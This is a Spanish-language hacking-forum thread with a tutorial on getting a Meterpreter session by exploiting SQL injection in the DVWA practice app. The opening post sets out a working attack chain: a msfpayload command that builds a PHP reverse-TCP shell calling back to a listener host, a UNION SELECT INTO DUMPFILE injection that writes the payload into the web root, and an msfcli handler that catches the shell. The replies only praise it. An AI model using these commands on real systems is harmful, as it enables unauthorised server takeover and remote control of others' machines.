comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Obtener una sesion meterpreter explotando SQL Injection

  • 2 Respuestas
  • 1777 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« en: Mayo 02, 2012, 11:07:49 am »
Hoy vamos a ver como obtener una sesión de Meteperter explotando una vulnerabilidad SQL Injectión, para recrear este ejemplo vamos a utilizar DVWA.

1. Creamos el payload:

Código: You are not allowed to view links. Register or Login
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 R > payload.php
2. Ahora este código lo tenemos que pasar la Hexadecimal. Para ello podéis emplear los multiples aplcaciones online que hay. Yo dejo las 2 que suelo usar:

You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

3. El codigo quedaría algo así:

Código: You are not allowed to view links. Register or Login
233c3f7068700a0a6572726f725f7265706f7274696e672830...
4. Inyectamos el siguiente comando en la aplicación web:

Código: You are not allowed to view links. Register or Login
' union select '',0x233c3f7068700a0a6572726f725f7265706f7274696e672830... into dumpfile '/opt/lampp/htdocs/uploads/payload.php'#
5. Nos quedamos escuchando para cuando se ejecuta el payload.

Código: You are not allowed to view links. Register or Login
msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 E

5. Ahora si nos vamos al sitio el cual hemos subido el payload (/opt/lampp/htdocs/uploads/) y lo ejecutamos tendríamos que obtener la sesión Meterpreter.

6. Si volvemos a la pantalla donde hemos dejado escuchando vemos que tenemos una sesión Meterpreter.




FUENTE: Segu-Info
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

Desconectado andrewtwo

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Agosto 30, 2012, 04:59:52 am »
Me gusto por la combinación con metasploit  ;)

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #2 en: Agosto 30, 2012, 01:26:24 pm »
Buen Aporte!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

 

¿Te gustó el post? COMPARTILO!



vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection

Iniciado por morodog

Respuestas: 1
Vistas: 1714
Último mensaje Junio 09, 2013, 12:05:31 pm
por ANTRAX
SQL Injection - Joomla módulo "com_fireboard"

Iniciado por M5f3r0

Respuestas: 0
Vistas: 1569
Último mensaje Agosto 16, 2013, 01:43:18 am
por M5f3r0
[Curso] SQL Injection desde 0 - Union based y Blind Boolean Based.

Iniciado por M5f3r0

Respuestas: 8
Vistas: 8214
Último mensaje Abril 21, 2017, 04:36:34 am
por M5f3r0
Mysql injection avanzada: "doble query/error based"

Iniciado por q3rv0

Respuestas: 2
Vistas: 2280
Último mensaje Agosto 30, 2012, 04:26:01 am
por andrewtwo
Intrusión a un Servidor Por SQLi y Obtener shell

Iniciado por hdbreaker

Respuestas: 11
Vistas: 4445
Último mensaje Julio 15, 2012, 09:12:22 am
por عя ҜΔŁĬ